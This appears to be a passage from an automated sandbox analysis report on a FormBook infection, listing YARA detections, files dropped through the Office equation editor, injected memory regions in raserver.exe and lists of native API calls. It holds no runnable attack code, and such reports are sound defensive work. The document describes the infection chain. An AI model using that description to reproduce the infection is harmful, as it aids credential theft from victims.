Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.walmart.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2151585169.0000000003C40000.00000002.00000001.sdmp	String found in binary or memory: http://www.windows.com/pctv.
Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.ya.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.yam.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www3.fnac.com/
Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www3.fnac.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://xml-us.amznxslt.com/onca/xml?Service=AWSECommerceService&Version=2008-06-26&Operation
Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://z.about.com/m/a08.ico

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Contains functionality for read data from the clipboard

Source: C:\Users\Public\vbc.exe

Code function: 4_2_00405042 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,

4_2_00405042

E-Banking Fraud:

Yara detected FormBook

Source: Yara match	File source: 00000007.00000002.2347711693.0000000000080000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2142670660.0000000009760000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2193671756.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000001.2139121707.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2347827615.0000000000220000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2193556104.0000000000290000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2347889213.0000000000430000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2193865699.0000000000710000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000000.2169573435.000000000293F000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 5.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.vbc.exe.9760000.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.1.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.vbc.exe.9760000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.1.vbc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPE

System Summary:

Malicious sample detected (through community Yara rule)

Source: 00000007.00000002.2347711693.0000000000080000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000002.2347711693.0000000000080000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000002.2142670660.0000000009760000.00000004.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000002.2142670660.0000000009760000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.2193671756.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.2193671756.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000001.2139121707.0000000000400000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000001.2139121707.0000000000400000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000007.00000002.2347827615.0000000000220000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000002.2347827615.0000000000220000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.2193556104.0000000000290000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.2193556104.0000000000290000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000007.00000002.2347889213.0000000000430000.00000004.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000002.2347889213.0000000000430000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.2193865699.0000000000710000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.2193865699.0000000000710000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000006.00000000.2169573435.000000000293F000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000000.2169573435.000000000293F000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 5.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 5.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 4.2.vbc.exe.9760000.7.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 4.2.vbc.exe.9760000.7.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 5.1.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 5.1.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 4.2.vbc.exe.9760000.7.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 4.2.vbc.exe.9760000.7.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 5.1.vbc.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 5.1.vbc.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 5.2.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 5.2.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group

Office equation editor drops PE file

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\Public\vbc.exe			Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\loader1[1].exe			Jump to dropped file

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Source: C:\Users\Public\vbc.exe	Memory allocated: 76E20000 page execute and read and write			Jump to behavior
Source: C:\Users\Public\vbc.exe	Memory allocated: 76D20000 page execute and read and write			Jump to behavior
Source: C:\Users\Public\vbc.exe	Memory allocated: 76E20000 page execute and read and write			Jump to behavior
Source: C:\Users\Public\vbc.exe	Memory allocated: 76D20000 page execute and read and write			Jump to behavior
Source: C:\Windows\SysWOW64\raserver.exe	Memory allocated: 76E20000 page execute and read and write			Jump to behavior
Source: C:\Windows\SysWOW64\raserver.exe	Memory allocated: 76D20000 page execute and read and write			Jump to behavior

Contains functionality to call native functions

Source: C:\Users\Public\vbc.exe	Code function: 5_2_004181D0 NtCreateFile,		5_2_004181D0
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00418280 NtReadFile,		5_2_00418280
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00418300 NtClose,		5_2_00418300
Source: C:\Users\Public\vbc.exe	Code function: 5_2_004183B0 NtAllocateVirtualMemory,		5_2_004183B0
Source: C:\Users\Public\vbc.exe	Code function: 5_2_004181CE NtCreateFile,		5_2_004181CE
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0041827A NtReadFile,		5_2_0041827A
Source: C:\Users\Public\vbc.exe	Code function: 5_2_004183AB NtAllocateVirtualMemory,		5_2_004183AB
Source: C:\Users\Public\vbc.exe	Code function: 5_2_007A0078 NtResumeThread,LdrInitializeThunk,		5_2_007A0078
Source: C:\Users\Public\vbc.exe	Code function: 5_2_007A0048 NtProtectVirtualMemory,LdrInitializeThunk,		5_2_007A0048
Source: C:\Users\Public\vbc.exe	Code function: 5_2_007A00C4 NtCreateFile,LdrInitializeThunk,		5_2_007A00C4
Source: C:\Users\Public\vbc.exe	Code function: 5_2_007A07AC NtCreateMutant,LdrInitializeThunk,		5_2_007A07AC
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0079F900 NtReadFile,LdrInitializeThunk,		5_2_0079F900
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0079F9F0 NtClose,LdrInitializeThunk,		5_2_0079F9F0
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0079FAE8 NtQueryInformationProcess,LdrInitializeThunk,		5_2_0079FAE8
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0079FAD0 NtAllocateVirtualMemory,LdrInitializeThunk,		5_2_0079FAD0
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0079FB68 NtFreeVirtualMemory,LdrInitializeThunk,		5_2_0079FB68
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0079FBB8 NtQueryInformationToken,LdrInitializeThunk,		5_2_0079FBB8
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0079FC60 NtMapViewOfSection,LdrInitializeThunk,		5_2_0079FC60
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0079FC90 NtUnmapViewOfSection,LdrInitializeThunk,		5_2_0079FC90
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0079FDC0 NtQuerySystemInformation,LdrInitializeThunk,		5_2_0079FDC0
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0079FD8C NtDelayExecution,LdrInitializeThunk,		5_2_0079FD8C
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0079FED0 NtAdjustPrivilegesToken,LdrInitializeThunk,		5_2_0079FED0
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0079FEA0 NtReadVirtualMemory,LdrInitializeThunk,		5_2_0079FEA0
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0079FFB4 NtCreateSection,LdrInitializeThunk,		5_2_0079FFB4
Source: C:\Users\Public\vbc.exe	Code function: 5_2_007A0060 NtQuerySection,		5_2_007A0060
Source: C:\Users\Public\vbc.exe	Code function: 5_2_007A10D0 NtOpenProcessToken,		5_2_007A10D0
Source: C:\Users\Public\vbc.exe	Code function: 5_2_007A1148 NtOpenThread,		5_2_007A1148
Source: C:\Users\Public\vbc.exe	Code function: 5_2_007A010C NtOpenDirectoryObject,		5_2_007A010C
Source: C:\Users\Public\vbc.exe	Code function: 5_2_007A01D4 NtSetValueKey,		5_2_007A01D4
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0079F8CC NtWaitForSingleObject,		5_2_0079F8CC
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0079F938 NtWriteFile,		5_2_0079F938
Source: C:\Users\Public\vbc.exe	Code function: 5_2_007A1930 NtSetContextThread,		5_2_007A1930
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0079FA50 NtEnumerateValueKey,		5_2_0079FA50
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0079FA20 NtQueryInformationFile,		5_2_0079FA20
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0079FAB8 NtQueryValueKey,		5_2_0079FAB8
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0079FB50 NtCreateKey,		5_2_0079FB50
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0079FBE8 NtQueryVirtualMemory,		5_2_0079FBE8
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0079FC48 NtSetInformationFile,		5_2_0079FC48
Source: C:\Users\Public\vbc.exe	Code function: 5_2_007A0C40 NtGetContextThread,		5_2_007A0C40
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0079FC30 NtOpenProcess,		5_2_0079FC30
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0079FD5C NtEnumerateKey,		5_2_0079FD5C
Source: C:\Users\Public\vbc.exe	Code function: 5_2_007A1D80 NtSuspendThread,		5_2_007A1D80
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0079FE24 NtWriteVirtualMemory,		5_2_0079FE24
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0079FF34 NtQueueApcThread,		5_2_0079FF34
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0079FFFC NtCreateProcessEx,		5_2_0079FFFC
Source: C:\Users\Public\vbc.exe	Code function: 5_1_004181D0 NtCreateFile,		5_1_004181D0
Source: C:\Users\Public\vbc.exe	Code function: 5_1_00418280 NtReadFile,		5_1_00418280
Source: C:\Users\Public\vbc.exe	Code function: 5_1_00418300 NtClose,		5_1_00418300
Source: C:\Users\Public\vbc.exe	Code function: 5_1_004183B0 NtAllocateVirtualMemory,		5_1_004183B0
Source: C:\Users\Public\vbc.exe	Code function: 5_1_004181CE NtCreateFile,		5_1_004181CE
Source: C:\Users\Public\vbc.exe	Code function: 5_1_0041827A NtReadFile,		5_1_0041827A
Source: C:\Users\Public\vbc.exe	Code function: 5_1_004183AB NtAllocateVirtualMemory,		5_1_004183AB
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_01F800C4 NtCreateFile,LdrInitializeThunk,		7_2_01F800C4
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_01F807AC NtCreateMutant,LdrInitializeThunk,		7_2_01F807AC
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_01F7F9F0 NtClose,LdrInitializeThunk,		7_2_01F7F9F0
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_01F7F900 NtReadFile,LdrInitializeThunk,		7_2_01F7F900
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_01F7FBB8 NtQueryInformationToken,LdrInitializeThunk,		7_2_01F7FBB8
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_01F7FB68 NtFreeVirtualMemory,LdrInitializeThunk,		7_2_01F7FB68
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_01F7FB50 NtCreateKey,LdrInitializeThunk,		7_2_01F7FB50
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_01F7FAE8 NtQueryInformationProcess,LdrInitializeThunk,		7_2_01F7FAE8
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_01F7FAD0 NtAllocateVirtualMemory,LdrInitializeThunk,		7_2_01F7FAD0
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_01F7FAB8 NtQueryValueKey,LdrInitializeThunk,		7_2_01F7FAB8
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_01F7FDC0 NtQuerySystemInformation,LdrInitializeThunk,		7_2_01F7FDC0
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_01F7FD8C NtDelayExecution,LdrInitializeThunk,		7_2_01F7FD8C
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_01F7FC60 NtMapViewOfSection,LdrInitializeThunk,		7_2_01F7FC60
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_01F7FFB4 NtCreateSection,LdrInitializeThunk,		7_2_01F7FFB4
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_01F7FED0 NtAdjustPrivilegesToken,LdrInitializeThunk,		7_2_01F7FED0
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_01F801D4 NtSetValueKey,		7_2_01F801D4
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_01F81148 NtOpenThread,		7_2_01F81148
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_01F8010C NtOpenDirectoryObject,		7_2_01F8010C
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_01F810D0 NtOpenProcessToken,		7_2_01F810D0
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_01F80078 NtResumeThread,		7_2_01F80078
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_01F80060 NtQuerySection,		7_2_01F80060
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_01F80048 NtProtectVirtualMemory,		7_2_01F80048
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_01F81930 NtSetContextThread,		7_2_01F81930
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_01F7F938 NtWriteFile,		7_2_01F7F938
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_01F7F8CC NtWaitForSingleObject,		7_2_01F7F8CC
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_01F7FBE8 NtQueryVirtualMemory,		7_2_01F7FBE8
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_01F7FA50 NtEnumerateValueKey,		7_2_01F7FA50
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_01F7FA20 NtQueryInformationFile,		7_2_01F7FA20
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_01F81D80 NtSuspendThread,		7_2_01F81D80
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_01F7FD5C NtEnumerateKey,		7_2_01F7FD5C
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_01F7FC90 NtUnmapViewOfSection,		7_2_01F7FC90
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_01F80C40 NtGetContextThread,		7_2_01F80C40
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_01F7FC48 NtSetInformationFile,		7_2_01F7FC48
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_01F7FC30 NtOpenProcess,		7_2_01F7FC30
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_01F7FFFC NtCreateProcessEx,		7_2_01F7FFFC
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_01F7FF34 NtQueueApcThread,		7_2_01F7FF34
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_01F7FEA0 NtReadVirtualMemory,		7_2_01F7FEA0
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_01F7FE24 NtWriteVirtualMemory,		7_2_01F7FE24
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_000981D0 NtCreateFile,		7_2_000981D0
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_00098280 NtReadFile,		7_2_00098280
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_00098300 NtClose,		7_2_00098300
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_000983B0 NtAllocateVirtualMemory,		7_2_000983B0
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_000981CE NtCreateFile,		7_2_000981CE
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_0009827A NtReadFile,		7_2_0009827A
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_000983AB NtAllocateVirtualMemory,		7_2_000983AB

Contains functionality to shutdown / reboot the system

Source: C:\Users\Public\vbc.exe

Code function: 4_2_0040323C EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcmpiA,CreateDirectoryA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,

4_2_0040323C

Detected potential crypto function

Source: C:\Users\Public\vbc.exe	Code function: 4_2_00404853		4_2_00404853
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00406131		4_2_00406131
Source: C:\Users\Public\vbc.exe	Code function: 4_2_73001A98		4_2_73001A98
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00401030		5_2_00401030
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0041C0A9		5_2_0041C0A9
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0041C1CD		5_2_0041C1CD
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0041B992		5_2_0041B992
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0041C2A7		5_2_0041C2A7
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0041A302		5_2_0041A302
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00408C6B		5_2_00408C6B
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00408C70		5_2_00408C70
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0041B4B3		5_2_0041B4B3
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00402D87		5_2_00402D87
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00402D90		5_2_00402D90
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0041BD9E		5_2_0041BD9E
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00402FB0		5_2_00402FB0
Source: C:\Users\Public\vbc.exe	Code function: 5_2_007C905A		5_2_007C905A
Source: C:\Users\Public\vbc.exe	Code function: 5_2_007B3040		5_2_007B3040
Source: C:\Users\Public\vbc.exe	Code function: 5_2_007DD005		5_2_007DD005
Source: C:\Users\Public\vbc.exe	Code function: 5_2_007AE0C6		5_2_007AE0C6
Source: C:\Users\Public\vbc.exe	Code function: 5_2_007AE2E9		5_2_007AE2E9
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00851238		5_2_00851238
Source: C:\Users\Public\vbc.exe	Code function: 5_2_007FA37B		5_2_007FA37B
Source: C:\Users\Public\vbc.exe	Code function: 5_2_007B7353		5_2_007B7353
Source: C:\Users\Public\vbc.exe	Code function: 5_2_008563BF		5_2_008563BF
Source: C:\Users\Public\vbc.exe	Code function: 5_2_007B2305		5_2_007B2305
Source: C:\Users\Public\vbc.exe	Code function: 5_2_007D63DB		5_2_007D63DB
Source: C:\Users\Public\vbc.exe	Code function: 5_2_007AF3CF		5_2_007AF3CF
Source: C:\Users\Public\vbc.exe	Code function: 5_2_007ED47D		5_2_007ED47D
Source: C:\Users\Public\vbc.exe	Code function: 5_2_007C1489		5_2_007C1489
Source: C:\Users\Public\vbc.exe	Code function: 5_2_007E5485		5_2_007E5485
Source: C:\Users\Public\vbc.exe	Code function: 5_2_007F6540		5_2_007F6540
Source: C:\Users\Public\vbc.exe	Code function: 5_2_007B351F		5_2_007B351F
Source: C:\Users\Public\vbc.exe	Code function: 5_2_007CC5F0		5_2_007CC5F0
Source: C:\Users\Public\vbc.exe	Code function: 5_2_007FA634		5_2_007FA634
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00852622		5_2_00852622
Source: C:\Users\Public\vbc.exe	Code function: 5_2_007BE6C1		5_2_007BE6C1
Source: C:\Users\Public\vbc.exe	Code function: 5_2_007B4680		5_2_007B4680
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0083579A		5_2_0083579A
Source: C:\Users\Public\vbc.exe	Code function: 5_2_007E57C3		5_2_007E57C3
Source: C:\Users\Public\vbc.exe	Code function: 5_2_007BC7BC		5_2_007BC7BC
Source: C:\Users\Public\vbc.exe	Code function: 5_2_007D286D		5_2_007D286D
Source: C:\Users\Public\vbc.exe	Code function: 5_2_007BC85C		5_2_007BC85C
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0084F8EE		5_2_0084F8EE
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0085098E		5_2_0085098E
Source: C:\Users\Public\vbc.exe	Code function: 5_2_007C69FE		5_2_007C69FE
Source: C:\Users\Public\vbc.exe	Code function: 5_2_007B29B2		5_2_007B29B2
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00835955		5_2_00835955
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00863A83		5_2_00863A83
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0085CBA4		5_2_0085CBA4
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0083DBDA		5_2_0083DBDA
Source: C:\Users\Public\vbc.exe	Code function: 5_2_007D7B00		5_2_007D7B00
Source: C:\Users\Public\vbc.exe	Code function: 5_2_007AFBD7		5_2_007AFBD7
Source: C:\Users\Public\vbc.exe	Code function: 5_2_007BCD5B		5_2_007BCD5B
Source: C:\Users\Public\vbc.exe	Code function: 5_2_007E0D3B		5_2_007E0D3B
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0084FDDD		5_2_0084FDDD
Source: C:\Users\Public\vbc.exe	Code function: 5_2_007CEE4C		5_2_007CEE4C
Source: C:\Users\Public\vbc.exe	Code function: 5_2_007E2E2F		5_2_007E2E2F
Source: C:\Users\Public\vbc.exe	Code function: 5_2_007DDF7C		5_2_007DDF7C
Source: C:\Users\Public\vbc.exe	Code function: 5_2_007C0F3F		5_2_007C0F3F
Source: C:\Users\Public\vbc.exe	Code function: 5_1_00401030		5_1_00401030
Source: C:\Users\Public\vbc.exe	Code function: 5_1_0041C0A9		5_1_0041C0A9
Source: C:\Users\Public\vbc.exe	Code function: 5_1_0041C1CD		5_1_0041C1CD
Source: C:\Users\Public\vbc.exe	Code function: 5_1_0041C2A7		5_1_0041C2A7
Source: C:\Users\Public\vbc.exe	Code function: 5_1_0041A302		5_1_0041A302
Source: C:\Users\Public\vbc.exe	Code function: 5_1_0041B4B3		5_1_0041B4B3
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_02031238		7_2_02031238
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_01F8E0C6		7_2_01F8E0C6
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_01FA905A		7_2_01FA905A
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_01F93040		7_2_01F93040
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_01FBD005		7_2_01FBD005
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_01FB63DB		7_2_01FB63DB
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_01F8F3CF		7_2_01F8F3CF
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_01FDA37B		7_2_01FDA37B
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_01F97353		7_2_01F97353
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_01F92305		7_2_01F92305
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_01F8E2E9		7_2_01F8E2E9
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_01FAC5F0		7_2_01FAC5F0
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_02032622		7_2_02032622
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_01F9351F		7_2_01F9351F
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_01FA1489		7_2_01FA1489
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_01FC5485		7_2_01FC5485
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_01FCD47D		7_2_01FCD47D
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_0201579A		7_2_0201579A
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_01FC57C3		7_2_01FC57C3
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_01F9C7BC		7_2_01F9C7BC
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_01F9E6C1		7_2_01F9E6C1
